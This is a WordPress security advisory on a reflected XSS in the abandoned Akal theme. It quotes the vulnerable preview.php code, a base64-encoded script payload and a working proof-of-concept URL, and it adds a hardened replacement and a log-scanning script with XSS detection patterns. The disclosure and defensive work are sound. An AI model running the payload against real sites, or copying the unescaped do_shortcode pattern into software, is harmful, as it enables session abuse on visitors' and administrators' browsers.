WordPress advisory: Akal premium theme XSS vulnerability & abandoned

Over the course of one week I had the opportunity to audit two hacked WordPress websites, and I quickly discovered two vulnerabilities: a Cross Site Scripting (XSS) vulnerability in the premium WordPress theme Akal, and a SQL injection Denial-of-Service in a plugin that will be disclosed later. This post describes the Akal premium WordPress theme XSS vulnerability.

I have to be honest: I'm not familiar with this theme. It has been removed from ThemeForest and seems abandoned, so I'm unable to offer quick fixes or patches, as they might break the theme completely.

Akal premium WordPress theme Cross Site Scripting (XSS) vulnerability

The theme Akal has already been pulled from ThemeForest, and it looks like the theme author has stopped the project. Since no updates are to be expected, my advice is to stop using this theme on your website.

The theme suffers from a reflected Cross Site Scripting (XSS) vulnerability that would allow an attacker to steal an admin's cookie, if WordPress weren't already protected against that type of attack (it sets the HttpOnly flag on its authentication cookies). Some information on that is available in my prettyPhoto XSS post from May 2014. However, you must still beware of the XSS watering-hole effect: a reflected XSS runs in the victim's browser, within the victim's logged-in session, whether or not the cookie itself can be read.


The vulnerable code is located in framework/brad-shortcodes/tinymce/preview.php:

<?php

// loads WordPress (see get_wp.php below), which makes this file callable directly, unauthenticated
require_once('get_wp.php'); // loads wordpress stuff

// gets shortcode: attacker-controlled, base64-decoded and never validated
$shortcode = base64_decode( trim( $_GET['sc'] ) );

?>
[...]
</style>
</head>
<body>
<?php echo do_shortcode( $shortcode ); ?> <!-- the result is echoed without any escaping -->
</body>
</html>

There is a lot wrong in these few lines of PHP. One problem is the contents of get_wp.php (see below); the other is this line:

$shortcode = base64_decode( trim( $_GET['sc'] ) );

This takes unvalidated $_GET input, base64-decodes it straight into the variable $shortcode, and then passes it to the WordPress function do_shortcode(), whose result is echoed into the page body unescaped.

So now let's look at the contents of get_wp.php:

<?php

$absolute_path = __FILE__;
$path_to_file = explode( 'wp-content', $absolute_path );
$path_to_wp = $path_to_file[0];

// Access WordPress
require_once( $path_to_wp . '/wp-load.php' );

?>

This simply loads wp-load.php, and with it all of WordPress' code, without any check on who is asking: preview.php can be requested directly in a browser, by anyone, without being logged in. A file that is meant to be included by WordPress should always test that it actually was, for example with:

if ( ! defined( 'ABSPATH' ) ) {
  exit;
}

Or:

if ( ! defined( 'YOUR_CONSTANT' ) ) {
  exit;
}

And use nonces in WordPress. Note that such a guard cannot simply be bolted onto get_wp.php: that file exists precisely to bootstrap WordPress for a direct request. The correct design is to not expose a directly callable script at all, but to route the preview through admin-ajax.php, where WordPress is already loaded, and to require a valid nonce and a capability check (current_user_can()) there before rendering anything.
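As an added example (this is not the theme's code, nor the author's), here is how the shortcode preview could be served safely through admin-ajax.php instead of a directly callable preview.php. The AJAX action name, the nonce action string, the script handle 'akal-shortcodes-tinymce' and the edit_posts capability are assumptions chosen for illustration; the WordPress functions used are real.

```php
<?php
/**
 * Hardened replacement for the Akal shortcode preview endpoint.
 * Added example, not the theme's code. The hook/action names, the nonce
 * action string, the script handle and the capability are assumptions.
 *
 * The original preview.php bootstrapped WordPress itself and could be
 * requested by anyone. Here the preview runs through admin-ajax.php, so
 * WordPress is already loaded, the request must carry a valid nonce, and
 * only users who may edit posts can reach it. Load this from functions.php.
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // included by WordPress, never requested directly
}

// Hand the nonce and URL to the TinyMCE plugin (assumed script handle), so
// it can build: admin-ajax.php?action=akal_shortcode_preview&nonce=...&sc=...
add_action( 'admin_enqueue_scripts', function () {
	wp_localize_script( 'akal-shortcodes-tinymce', 'akalPreview', array(
		'ajaxUrl' => admin_url( 'admin-ajax.php' ),
		'nonce'   => wp_create_nonce( 'akal_shortcode_preview' ),
	) );
} );

// Logged-in users only: there is deliberately no wp_ajax_nopriv_ hook.
add_action( 'wp_ajax_akal_shortcode_preview', 'akal_render_shortcode_preview' );

function akal_render_shortcode_preview() {
	// 1. CSRF protection: dies with HTTP 403 if the nonce is missing or stale.
	check_ajax_referer( 'akal_shortcode_preview', 'nonce' );

	// 2. Authorization: the preview is an editor feature, nothing more.
	if ( ! current_user_can( 'edit_posts' ) ) {
		wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
	}

	// 3. Input validation: strict base64 decoding, and the result must be a
	//    shortcode for a tag this site has actually registered. Requiring a
	//    leading '[' also closes the bypass where do_shortcode() returns
	//    input without '[' unchanged. The tag pattern is deliberately strict.
	$raw       = isset( $_GET['sc'] ) ? wp_unslash( $_GET['sc'] ) : '';
	$shortcode = base64_decode( trim( $raw ), true );
	if ( false === $shortcode
		|| ! preg_match( '/^\[([a-z0-9_-]+)/i', $shortcode, $m )
		|| ! shortcode_exists( $m[1] ) ) {
		wp_die( 'Invalid shortcode.', '', array( 'response' => 400 ) );
	}

	// 4. Output encoding: wp_kses_post() removes script tags, event-handler
	//    attributes and javascript: URLs from the rendered markup.
	echo '<!DOCTYPE html><html><head><meta charset="utf-8"></head><body>';
	echo wp_kses_post( do_shortcode( $shortcode ) );
	echo '</body></html>';
	wp_die(); // end the AJAX request cleanly
}
```

Each of the four steps addresses a separate defect in the original: the nonce stops a third party from making an editor's browser load a crafted preview, the capability check keeps anonymous visitors out, the validation rejects anything that is not one of the site's own shortcodes, and the output filter means that even a shortcode producing unexpected markup cannot inject script into the editor's page.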

In this particular case, WordPress' do_shortcode() provides no protection at all: it expands shortcodes, it does not sanitize. In the developer documentation we find its source, and the relevant part is on lines 205 – 207:

if ( false === strpos( $content, '[' ) ) {
  return $content;
}

If $content contains no '[', it is simply returned unchanged, and preview.php echoes it into the page as-is.

Knowing that our payload is returned verbatim as long as it contains no '[', we can start attacking. You will have noticed $shortcode = base64_decode( trim( $_GET['sc'] ) );, so our input has to be base64 encoded.

No problem there, bash does that for us :-).

After a few tries I came up with the following XSS payload, which successfully popped an alert in my browser:

echo -n '<script>alert("xss </script%3E")</script>' | base64
PHNjcmlwdD5hbGVydCgieHNzIDwvc2NyaXB0JTNFIik8L3NjcmlwdD4=

PoC URL:

http://example.com/wp-content/themes/akal/framework/brad-shortcodes/tinymce/preview.php?sc=PHNjcmlwdD5hbGVydCgieHNzIDwvc2NyaXB0JTNFIik8L3NjcmlwdD4=
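Since this theme turned up during the audit of hacked sites, the natural follow-up is to look for exploitation attempts in the web server's access log. The script below is an added example for that (not code from the original post or the theme): it finds requests to preview.php, decodes the sc= parameter and flags payloads that are not shortcodes. It assumes the common Apache/nginx "combined" log format; the sample log lines are constructed for the demonstration, and the second one carries the PoC payload from this post.

```php
<?php
/**
 * Scan a web server access log for requests to the Akal preview.php
 * endpoint and decode what was sent in the sc= parameter.
 *
 * Added example for incident response, not the theme's or the post
 * author's code. Assumes the Apache/nginx "combined" log format.
 *
 * Usage: php akal-log-scan.php /var/log/apache2/access.log
 *        (without an argument the constructed sample lines below are used)
 */

const AKAL_PREVIEW_PATH = '/framework/brad-shortcodes/tinymce/preview.php';

/**
 * Return details for a log line that requests preview.php with an sc=
 * parameter, or null when the line is unrelated.
 */
function akal_inspect_log_line( $line ) {
	if ( false === strpos( $line, AKAL_PREVIEW_PATH ) ) {
		return null;
	}
	// Combined format: CLIENT_IP - - [date] "METHOD /path?query HTTP/x.y" ...
	if ( ! preg_match( '#^(\S+) .*?"[A-Z]+ (\S+) HTTP/#', $line, $m ) ) {
		return null;
	}
	list( , $ip, $target ) = $m;

	// Take the raw sc= value. rawurldecode() is used on purpose: urldecode()
	// or parse_str() would turn a literal '+' into a space and corrupt the
	// base64 alphabet.
	if ( ! preg_match( '/[?&]sc=([^&\s"]*)/', $target, $sc ) ) {
		return null;
	}
	$payload = base64_decode( rawurldecode( $sc[1] ), true ); // strict: false on junk

	// The theme's own TinyMCE plugin legitimately calls this endpoint with a
	// shortcode, so a hit alone is not an attack. A payload is suspicious
	// when it is not a shortcode at all (no leading '[', exactly the
	// do_shortcode() pass-through case) or carries script-like content.
	$suspicious = ( false === $payload )
		|| '[' !== substr( ltrim( $payload ), 0, 1 )
		|| preg_match( '/<\s*script|<\s*\w+[^>]*\son\w+\s*=|javascript:/i', $payload );

	return array(
		'ip'         => $ip,
		'payload'    => ( false === $payload ) ? '(invalid base64)' : $payload,
		'suspicious' => (bool) $suspicious,
	);
}

/** Run the inspection over every line and keep the preview.php hits. */
function akal_scan_log( array $lines ) {
	$hits = array();
	foreach ( $lines as $n => $line ) {
		$result = akal_inspect_log_line( $line );
		if ( null !== $result ) {
			$result['line'] = $n + 1;
			$hits[]         = $result;
		}
	}
	return $hits;
}

// Constructed sample lines: a legitimate editor preview, the PoC payload
// from this post, and an unrelated request.
$sample = array(
	'192.0.2.10 - - [01/Jan/2016:10:00:00 +0100] "GET /wp-content/themes/akal' . AKAL_PREVIEW_PATH
		. '?sc=' . base64_encode( '[button url="/contact"]Contact[/button]' ) . ' HTTP/1.1" 200 512',
	'198.51.100.7 - - [01/Jan/2016:10:05:00 +0100] "GET /wp-content/themes/akal' . AKAL_PREVIEW_PATH
		. '?sc=PHNjcmlwdD5hbGVydCgieHNzIDwvc2NyaXB0JTNFIik8L3NjcmlwdD4= HTTP/1.1" 200 384',
	'203.0.113.5 - - [01/Jan/2016:10:06:00 +0100] "GET /index.php HTTP/1.1" 200 10240',
);

$lines = isset( $argv[1] ) ? file( $argv[1], FILE_IGNORE_NEW_LINES ) : $sample;

foreach ( akal_scan_log( $lines ) as $hit ) {
	printf( "line %d  %-15s %s  %s\n", $hit['line'], $hit['ip'],
		$hit['suspicious'] ? 'SUSPICIOUS' : 'ok        ', $hit['payload'] );
}
```

On the sample input the first hit is reported as ok (a real shortcode), the second as SUSPICIOUS with the decoded script tag, and the index.php line is ignored. Because editors used this endpoint legitimately while the theme was in use, judge by the decoded payload and the requesting IP, not by the mere presence of preview.php in the log.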

I've tried to contact the theme author bradweb, but all links are dead ends. I haven't checked for other vulnerabilities in this theme yet.


Looking for a WordPress Plugin Security Testing Cheat Sheet? Ryan Dewhurst created one; use it!

WPScan Vulnerability Database ID: 8607.




Jan Reilink

My name is Jan. I am not a hacker, coder, developer, programmer or guru. I am merely a system administrator, doing my daily thing at Vevida in the Netherlands. With over 15 years of experience, my specialties include Windows Server, IIS, Linux (CentOS, Debian), security, PHP, websites & optimization.


2 Comments on "WordPress advisory: Akal premium theme XSS vulnerability & abandoned"


Guest

Nice work :D

Meryl Glickman
Guest

Do you or any of your followers have a recommendation for another theme to replace this one? My client has this theme and would like to switch. Would love any comments as to whether anyone did this and what they encountered. Note: my website listed is not the site in question; I have a confidentiality agreement and cannot provide the name of the site with the Akal theme. Thank you for your understanding.